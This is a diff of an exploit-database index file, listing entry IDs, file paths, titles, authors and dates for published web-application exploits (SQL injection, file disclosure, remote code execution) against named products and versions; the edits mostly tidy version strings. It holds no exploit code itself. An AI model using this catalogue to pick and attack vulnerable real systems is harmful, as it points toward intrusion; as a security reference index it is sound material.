9465,exploits/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,webapps,php,
@ -24463,7 +24477,7 @@ id,file,description,date,author,type,platform,port
14578,exploits/php/webapps/14578.php,"PHPKick 0.8 - 'Statistics.php' SQL Injection",2010-08-08,garwga,webapps,php,
14585,exploits/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,webapps,php,
14598,exploits/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injections",2010-08-10,"Salvatore Fresta",webapps,php,
14589,exploits/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,webapps,php,
14589,exploits/php/webapps/14589.txt,"PHP-Nuke 8.x - Blind SQL Injection",2010-08-09,ITSecTeam,webapps,php,
14592,exploits/php/webapps/14592.txt,"Joomla! Component com_yellowpages - SQL Injection",2010-08-09,"al bayraqim",webapps,php,
14595,exploits/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,webapps,php,
14596,exploits/php/webapps/14596.txt,"Joomla! Component Amblog 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",webapps,php,
@ -25688,7 +25702,7 @@ id,file,description,date,author,type,platform,port
17995,exploits/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,webapps,php,
17997,exploits/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",webapps,php,
17998,exploits/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",webapps,php,
17999,exploits/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure",2011-10-19,"Lagripe-Dz & Mca-Crb",webapps,php,
17999,exploits/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure",2011-10-19,"Lagripe-Dz & Mca-Crb",webapps,php,
18000,exploits/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta - 'force_download.php' Local File Inclusion",2011-10-19,"Sangyun YOO",webapps,php,
18001,exploits/php/webapps/18001.txt,"CMS mini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,webapps,php,
18002,exploits/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",webapps,php,
@ -25727,7 +25741,7 @@ id,file,description,date,author,type,platform,port
18075,exploits/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,webapps,php,
18076,exploits/php/webapps/18076.txt,"Advanced Poll 2.02 - SQL Injection",2011-11-04,"Yassin Aboukir",webapps,php,
18077,exploits/windows/webapps/18077.txt,"HP Data Protector Media Operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",webapps,windows,
18081,exploits/php/webapps/18081.txt,"WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure",2011-11-04,"red virus",webapps,php,
18081,exploits/php/webapps/18081.txt,"WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure",2011-11-04,"red virus",webapps,php,
18083,exploits/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php,
18084,exploits/php/webapps/18084.php,"PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php,
18085,exploits/php/webapps/18085.php,"aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php,
@ -28136,7 +28150,7 @@ id,file,description,date,author,type,platform,port
25403,exploits/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - 'Album_Cat.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php,
25404,exploits/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - 'Album_Comment.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php,
25405,exploits/php/webapps/25405.txt,"Getsimple CMS 3.2.1 - Arbitrary File Upload",2013-05-13,"Ahmed Elhady Mohamed",webapps,php,
25409,exploits/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php,
25409,exploits/php/webapps/25409.txt,"Ajax Availability Calendar 3.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php,
25410,exploits/php/webapps/25410.txt,"Joomla! Component com_s5clanroster - 'id' SQL Injection",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php,
25412,exploits/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,ios,
25413,exploits/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1/1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,hardware,
@ -35257,13 +35271,13 @@ id,file,description,date,author,type,platform,port
36228,exploits/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",webapps,php,
36230,exploits/php/webapps/36230.txt,"WordPress Plugin Calculated Fields Form 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",webapps,php,
36231,exploits/php/webapps/36231.py,"GoAutoDial CE 2.0 - Arbitrary File Upload",2015-02-28,R-73eN,webapps,php,
36232,exploits/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,webapps,php,80
36232,exploits/php/webapps/36232.txt,"vBulletin vBSEO 4.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,webapps,php,80
36233,exploits/php/webapps/36233.txt,"WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",webapps,php,
36236,exploits/php/webapps/36236.txt,"Xenon - 'id' Multiple SQL Injections",2011-10-14,m3rciL3Ss,webapps,php,
36237,exploits/php/webapps/36237.txt,"asgbookPHP 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,webapps,php,
36240,exploits/php/webapps/36240.txt,"Site@School 2.4.10 - '/index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",webapps,php,
36241,exploits/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",webapps,hardware,
36242,exploits/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,webapps,php,
36242,exploits/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,webapps,php,
36243,exploits/php/webapps/36243.txt,"WordPress Plugin cp-multi-view-calendar 1.1.4 - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",webapps,php,
36248,exploits/php/webapps/36248.txt,"osCommerce - Arbitrary File Upload / File Disclosure",2011-10-20,indoushka,webapps,php,
36249,exploits/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",webapps,php,
@ -36643,7 +36657,7 @@ id,file,description,date,author,type,platform,port
38520,exploits/php/webapps/38520.html,"WordPress Plugin WP Cleanfix - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",webapps,php,
38523,exploits/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injections",2013-05-23,XroGuE,webapps,php,
38524,exploits/php/webapps/38524.pl,"Matterdaddy Market - Multiple Vulnerabilities",2013-05-24,KedAns-Dz,webapps,php,
38525,exploits/php/webapps/38525.txt,"Subrion 3.X.x - Multiple Vulnerabilities",2015-10-23,bRpsd,webapps,php,
38525,exploits/php/webapps/38525.txt,"Subrion 3.x - Multiple Vulnerabilities",2015-10-23,bRpsd,webapps,php,
38527,exploits/php/webapps/38527.txt,"Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",webapps,php,
38528,exploits/php/webapps/38528.txt,"Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",webapps,php,
38572,exploits/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,webapps,php,
@ -39094,6 +39108,7 @@ id,file,description,date,author,type,platform,port
43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592
43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80
43347,exploits/php/webapps/43347.txt,"Ciuis CRM 1.0.7 - SQL Injection",2017-12-18,"Zahid Abbasi",webapps,php,
43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php,
43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
44158,exploits/php/webapps/44158.txt,"Joomla! Component CW Tags 2.0.6 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
@ -39173,6 +39188,7 @@ id,file,description,date,author,type,platform,port
44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl,
44387,exploits/hardware/webapps/44387.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials",2018-04-02,LiquidWorm,webapps,hardware,
44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware,
44390,exploits/windows/webapps/44390.py,"LifeSize ClearSea 3.1.4 - Directory Traversal",2018-04-02,rsp3ar,webapps,windows,
44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware,
@ -39184,6 +39200,7 @@ id,file,description,date,author,type,platform,port
44406,exploits/php/webapps/44406.txt,"Z-Blog 1.5.1.1740 - Cross-Site Scripting",2018-04-05,zzw,webapps,php,
44407,exploits/php/webapps/44407.txt,"Z-Blog 1.5.1.1740 - Full Path Disclosure",2018-04-05,zzw,webapps,php,
44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php,
44409,exploits/php/webapps/44409.txt,"WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting",2018-04-05,"Stefan Broeder",webapps,php,
44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php,
@ -39257,3 +39274,5 @@ id,file,description,date,author,type,platform,port
44560,exploits/php/webapps/44560.py,"Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root",2018-04-30,"Jared Arave",webapps,php,
44563,exploits/php/webapps/44563.txt,"WordPress Plugin Responsive Cookie Consent 1.7 / 1.6 / 1.5 - Authenticated Persistent Cross-Site Scripting",2018-05-01,B0UG,webapps,php,
44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80
44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware,
44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,

Can't render this file because it is too large.